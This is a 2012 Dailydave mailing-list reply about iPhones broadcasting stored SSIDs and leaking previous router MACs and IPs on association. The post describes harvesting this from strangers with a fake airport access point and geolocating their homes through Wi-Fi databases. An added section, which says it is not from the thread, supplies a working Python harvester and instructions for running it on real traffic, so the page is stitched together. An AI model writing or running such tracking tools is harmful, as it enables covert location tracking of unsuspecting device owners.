Dailydave mailing list archives

Re: Wireless Disclosures


From: Robert Graham <robert_david_graham () yahoo com>
Date: Thu, 22 Mar 2012 15:30:57 -0700 (PDT)

In our experience, this is not exactly the case. What Robert describes does 
happen but, after a couple of minutes, if a connection has not yet
been established, the iPhone will indeed broadcast probes for all recently
connected SSIDs. How recent is recent? In our experiments, _all_ SSIDs
stored in the device were being disclosed.

We've seen this behavior with iOS 3, 4 and 5. This is obvious in
the attached packet capture screenshot, where one can see the initial
broadcasts to ANY as described by Robert, but then comes the disclosure
with all stored SSIDs being broadcast.


That's interesting.

My experience is that while sitting in the front lobby as employees walk by, I get more SSIDs from other devices than 
Apple's. What you are saying is that I need to be more patient.



The second disclosure that came up in the Ars comments has to do with
the MAC addresses of previously seen DHCP servers.
This behavior is documented in RFC 4436 [4]:


I thought it ARPed the router, not the DHCP server, but either is allowed by the RFC.

It discloses these 3 MAC addresses after it "associates" to the access-point, but before it gets a DHCP address. It's 
very reliable. You can sit at an airport with a fake access-point broadcasting "attwifi" and "Apple Store" and get a 
ton of this info, even without giving them a DHCP assignment.

This also discloses the previously assigned IP address of the device, as well as the IP address of the router/DHCP 
server. These days, these addresses are almost always "local" addresses like 10.2.3.4, but sometimes you can get 
routable addresses, and thus find the "home" organization of the device.

In theory, you can use these MAC addresses with the Google, SkyHook, Microsoft, Apple, and Wigle.net databases to find 
their home address. Unfortunately, these databases now require two MAC addresses to work, in order to guard against 
this sort of abuse. The Wigle.net database allows this, but it's not very complete. But, if you have certain targets in 
mind, you can do your own GPS mapping of an area.

In theory, once you get these MAC addresses, you can send beacons from them with empty SSID fields, and otherwise 
silent devices will give up their SSIDs. Sadly, I haven't tested this yet, because my own home network separates the 
router and DHCP server from the access-points, so it can't work for my devices this way.
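The two leaks discussed in this thread (stored SSIDs in probe requests, and the previous IP/router IP/router MAC in the RFC 4436 unicast ARP test sent right after association) can be harvested passively from a capture. The following is an added example written for this archive page, not code posted by anyone in the thread. It parses raw 802.11 management frames and Ethernet/ARP frames by hand so it runs without scapy, and all frames, MAC addresses and IP addresses in it are constructed sample data, not real captures. The field layout assumed is the standard one: 802.11 probe request = frame control, duration, three addresses, sequence control, then tagged parameters with tag 0 = SSID; RFC 4436 test = an ARP request sent unicast to the test node's MAC with the host's previous address as the sender IP and the test node's MAC/IP as the target.

```python
"""Passive harvester for the two iOS disclosures discussed in the thread:
1. 802.11 probe requests carrying a non-empty SSID (stored network names);
2. RFC 4436 (DNAv4) unicast ARP reachability tests, which carry the client's
   previous IP and the previous router's IP and MAC.
All frames below are constructed inline for illustration, not real captures.
"""
import struct
from collections import defaultdict

BROADCAST = b"\xff" * 6


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def parse_probe_request(frame):
    """Return (client_mac, ssid) for an 802.11 probe request, else None.
    Layout: FC(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2) tags..."""
    if len(frame) < 24:
        return None
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0 or subtype != 4:          # management frame, probe request
        return None
    client = mac_str(frame[10:16])          # Addr2 = transmitter (the client)
    body, i = frame[24:], 0
    while i + 2 <= len(body):
        tag, ln = body[i], body[i + 1]
        if tag == 0:                        # SSID element; empty = wildcard ("ANY")
            return client, body[i + 2:i + 2 + ln].decode("utf-8", "replace")
        i += 2 + ln
    return client, ""


def parse_dnav4_arp(frame):
    """Return (client_mac, prev_ip, router_ip, router_mac) if the Ethernet frame
    is an RFC 4436 reachability test: an ARP request delivered unicast with a
    non-zero target MAC. Ordinary ARP requests are broadcast with a zero target
    MAC, and RFC 5227 conflict probes use sender IP 0.0.0.0, so both are skipped."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    dst = frame[0:6]
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen, op) != (1, 0x0800, 6, 4, 1):
        return None
    sha, spa, tha, tpa = frame[22:28], frame[28:32], frame[32:38], frame[38:42]
    if dst == BROADCAST or tha == b"\x00" * 6 or spa == b"\x00" * 4:
        return None
    return mac_str(sha), ip_str(spa), ip_str(tpa), mac_str(tha)


def harvest(frames):
    """frames: iterable of (link, raw_bytes) with link in {"80211", "ether"}.
    Returns {client_mac: {"ssids": set(), "networks": set((prev_ip, router_ip, router_mac))}}."""
    out = defaultdict(lambda: {"ssids": set(), "networks": set()})
    for link, raw in frames:
        if link == "80211":
            r = parse_probe_request(raw)
            if r and r[1]:                  # ignore wildcard probes, they leak nothing
                out[r[0]]["ssids"].add(r[1])
        elif link == "ether":
            r = parse_dnav4_arp(raw)
            if r:
                out[r[0]]["networks"].add(r[1:])
    return dict(out)


# --- constructed sample frames (hypothetical client and networks) -------------
def build_probe_request(client_mac, ssid):
    hdr = b"\x40\x00" + b"\x00\x00" + BROADCAST + client_mac + BROADCAST + b"\x00\x00"
    return hdr + bytes([0, len(ssid)]) + ssid + bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])


def build_dnav4_arp(client_mac, prev_ip, router_ip, router_mac):
    eth = router_mac + client_mac + b"\x08\x06"        # unicast to the old router
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1) + client_mac + prev_ip + router_mac + router_ip
    return eth + arp


CLIENT = bytes.fromhex("001122334455")                 # constructed, not a real device
SAMPLE_FRAMES = [
    ("80211", build_probe_request(CLIENT, b"")),        # wildcard probe: no disclosure
    ("80211", build_probe_request(CLIENT, b"HomeNet")),
    ("80211", build_probe_request(CLIENT, b"CorpWiFi")),
    ("ether", build_dnav4_arp(CLIENT, bytes([10, 0, 0, 23]), bytes([10, 0, 0, 1]), bytes.fromhex("aabbccddeeff"))),
    ("ether", build_dnav4_arp(CLIENT, bytes([192, 168, 1, 7]), bytes([192, 168, 1, 1]), bytes.fromhex("0a1b2c3d4e5f"))),
    # ordinary broadcast ARP request with zero target MAC: not a DNAv4 test
    ("ether", BROADCAST + CLIENT + b"\x08\x06" + struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)
              + CLIENT + bytes([10, 0, 0, 23]) + b"\x00" * 6 + bytes([10, 0, 0, 1])),
]

if __name__ == "__main__":
    for client, info in harvest(SAMPLE_FRAMES).items():
        print(client, "SSIDs:", sorted(info["ssids"]))
        for prev_ip, router_ip, router_mac in sorted(info["networks"]):
            print("   was", prev_ip, "behind", router_ip, "(" + router_mac + ")")
```

To use this on real traffic, feed it frames read from a monitor-mode capture for the probe requests and from the fake access point's wired/bridge side for the ARP tests; the distinguishing feature of the RFC 4436 packet is that it is unicast at layer 2 with a non-zero target MAC and a non-zero sender IP, which is exactly what no ordinary ARP request or RFC 5227 probe looks like. Those (prev_ip, router_ip, router_mac) triples are the input to the war-driving database lookups and the empty-SSID beacon trick the thread describes.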

_______________________________________________
Dailydave mailing list
Dailydave () lists immunityinc com
http://lists.immunityinc.com/mailman/listinfo/dailydave
